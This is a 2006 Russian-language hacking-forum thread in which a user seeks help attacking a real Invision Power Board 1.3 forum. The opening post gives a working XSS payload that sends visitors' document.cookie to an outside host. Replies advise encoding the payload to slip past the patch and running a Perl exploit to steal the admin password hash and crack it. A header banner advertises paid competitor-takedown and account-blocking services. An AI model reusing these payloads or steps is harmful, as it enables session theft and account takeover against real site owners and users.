Форум АНТИЧАТ - Invision 1.3 Xss ?

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Invision 1.3 Xss ?

Опции темы

Поиск в этой теме

Опции просмотра

Invision 1.3 Xss ?

23.05.2006, 17:26

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

Провел на форуме:
6520559

Репутация: 2947

Invision 1.3 Xss ?

Нужна поиощь есть форум

http://forum.низя ссылки.ru

Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.

На нем я использовал

[E*MAIL][U*RL=wj`=`][/U*RL][/E*MAIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.org/s/slider.gif?"+document.cookie)`

Дыру закрыли

То ест теперь видя этот XSS Непроисходит никаких действий то есть подпись такой же становится как содержимое XSS

Помогите зашифровать его или другой способ!!

Пробовал через картинку! (Вродь картинку поставил но Hash пароля не пришол) За ранее thank's

Последний раз редактировалось Azazel; 23.05.2006 в 17:35..

25.05.2006, 18:31

*Van*

Постоянный

Регистрация: 14.08.2005

Сообщений: 378

Провел на форуме:
670862

Репутация: 54

Отправить сообщение для *Van* с помощью ICQ

Попробуй зашифровать некоторые фрагменты сплойта тут:
_http://www.h4cky0u.org/encrypt/index.php
в кодировку HTML Entities

25.05.2006, 20:08

em00s7

Участник форума

Регистрация: 02.05.2006

Сообщений: 193

Провел на форуме:
530613

Репутация: 25

Отправить сообщение для em00s7 с помощью ICQ

ТЫ не пробывал Этот эксплоит

26.05.2006, 18:44

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

Провел на форуме:
6520559

Репутация: 2947

Как использовать сплойт на forum.test.ru ID юзера 123
perl 1.pl test.ru /forum/ 123 0

Так?

26.05.2006, 18:53

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

Провел на форуме:
6520559

Репутация: 2947

Нашол другой XSS

Можно ли его вставиить в картинку ??

wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.org/s/slider.gif?"+document.cookie);

26.05.2006, 19:54

SanyaX

.::Club Life::.

Регистрация: 28.01.2005

Сообщений: 1,205

Провел на форуме:
7426415

Репутация: 1398

Отправить сообщение для SanyaX с помощью ICQ

да зачем тебе с XSS париться. Вот паренёк дал сплойт. Запускай вводи типо C:\bin\perl.exe C:\file.pl http://lol.ru forum/ 1 0. И всё хэш админа твой. Теперь в руки passwords pro и ты поимел админа аккаунт.

__________________
-=Ok let's Go=-
-=OpenVPN=-

01.06.2006, 13:01

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

Провел на форуме:
6520559

Репутация: 2947

Ладно ЗАКРЫЛИ!

Непрошол exploit

Последний раз редактировалось slider; 01.06.2006 в 13:46..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss черви и вирусы: сообщества уязвимых	Utochka	Чужие Статьи	3	28.08.2006 00:26
Active XSS in Invision Power Board 2.1.4	k00p3r	Уязвимости	8	03.03.2006 20:51
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final	rsha1988	Форумы	12	15.02.2005 01:44

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход